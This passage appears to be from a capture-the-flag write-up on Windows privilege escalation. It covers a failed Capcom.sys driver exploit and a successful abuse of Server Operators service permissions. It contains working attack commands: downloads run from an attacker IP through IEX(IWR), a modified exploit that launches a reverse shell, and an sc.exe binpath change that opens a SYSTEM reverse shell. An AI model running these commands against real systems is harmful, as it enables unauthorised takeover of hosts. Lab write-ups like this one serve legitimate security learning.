PS C:\Windows\Tasks> .\EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Windows\Tasks\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3750359090-2939318659-876128439-1103\System\CurrentControlSet\MyService
NTSTATUS: c00000e5, WinError: 0
```

NTSTATUS `c00000e5` implies [STATUS_INTERNAL_ERROR](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55).  
I have no idea what went wrong, but I continued with the exploit, hoping the driver was loaded.  
[ExploitCapcom](https://github.com/tandasat/ExploitCapcom) can be used to exploit the vulnerability in this driver.  
Before building it, I modified it a bit:

```diff
-    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
+    TCHAR CommandLine[] = TEXT("C:\\Windows\\Tasks\\revshell.exe");
```

Open the solution, update `PlatformToolset` to `v143`, set the configuration to "x64 Release", and use <kbd>Ctrl</kbd>+<kbd>B</kbd> to build.

We also need to build `revshell.exe`. The easiest option would be to use `msfvenom`, but I'm on a new Debian VM and most of the tools are not installed yet.  
I used the code for "C Windows" payload from <https://www.revshells.com/> and compiled it in the `Developer Command Prompt for VS`. (I had to replace `strcpy_s` with `strcpy`)

```console
D:\HTB> cl revshell.c
Microsoft (R) C/C++ Optimizing Compiler Version 19.35.32217.1 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.

revshell.c
Microsoft (R) Incremental Linker Version 14.35.32217.1
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:revshell.exe
revshell.obj
```

```console
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/ExploitCapcom.exe -o ExploitCapcom.exe
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/revshell.exe -o revshell.exe
PS C:\Windows\Tasks> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[-] CreateFile failed
```

Of course. I also tried some of the other variants and precompiled executables, but they all resulted in same error.  
I plan to come back to reattempt once I have a better understanding of windows. Some resources that I plan to go through:
- <https://www.youtube.com/watch?v=1l45-Y48Zf0>
- <https://blog.nviso.eu/2022/01/10/kernel-karnage-part-8-getting-around-dse/>
- <https://v1k1ngfr.github.io/loading-windows-unsigned-driver/>

## Approach 5: Privilege escalation using Server Operators group

If we run [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.45:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck
```

Aside from the above-mentioned privileges, it also finds other issues:

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service permissions                               ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on  ┃
┃ a service through the Service Control Manager (SCM).         ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Vulnerable - High 


Name              : 1394ohci
ImagePath         : \SystemRoot\System32\drivers\1394ohci.sys
User              :
AccessRights      : AllAccess
IdentityReference : BUILTIN\Server Operators
Status            : Stopped
UserCanStart      : True
UserCanStop       : True

[--SNIP--]

┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service registry permissions                      ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on  ┃
┃ the configuration of a service in the registry.              ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Vulnerable - High 


Name              : ADWS
ImagePath         : C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
User              : LocalSystem
ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\ADWS
IdentityReference : BUILTIN\Server Operators
Permissions       : Notify, ReadControl, EnumerateSubKeys, Delete, CreateSubKey, SetValue, QueryValue
Status            : Running
UserCanStart      : True
UserCanStop       : True

[--SNIP--]
```

It is clear that `svc-printer` is a member of `Server Operators` group.  
Therefore, we have write permission over services. We can find the services running with system privilege:

```console
PS C:\> (gci HKLM:\SYSTEM\ControlSet001\Services |Get-ItemProperty | where {$_.ObjectName -match 'LocalSystem'}).PSChildName
ADWS 
AppHostSvc
Appinfo
AppMgmt
AppReadiness
AppVClient
AppXSvc
AudioEndpointBuilder
AxInstSV
BITS
[--SNIP--]
WinDefend
Winmgmt
wisvc
wlidsvc
wmiApSrv
WPDBusEnum
WpnService
WpnUserService
WSearch
wuauserv
```

Modifying `ADWS` might break the box, so I tried changing the configuration for the `AppHostSvc` service:

```console
PS C:\> sc.exe config AppHostSvc binpath="C:\Windows\System32\cmd.exe /c powershell.exe IEX(IWR http://10.10.14.45:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.45 9001"
[SC] ChangeServiceConfig SUCCESS
PS C:\> sc.exe stop AppHostSvc

SERVICE_NAME: AppHostSvc
        TYPE               : 30  WIN32
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) 
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x4e20
PS C:\> sc.exe start AppHostSvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
```

But I received a shell as system:

```console
PS C:\Windows\system32> whoami
nt authority\system
```
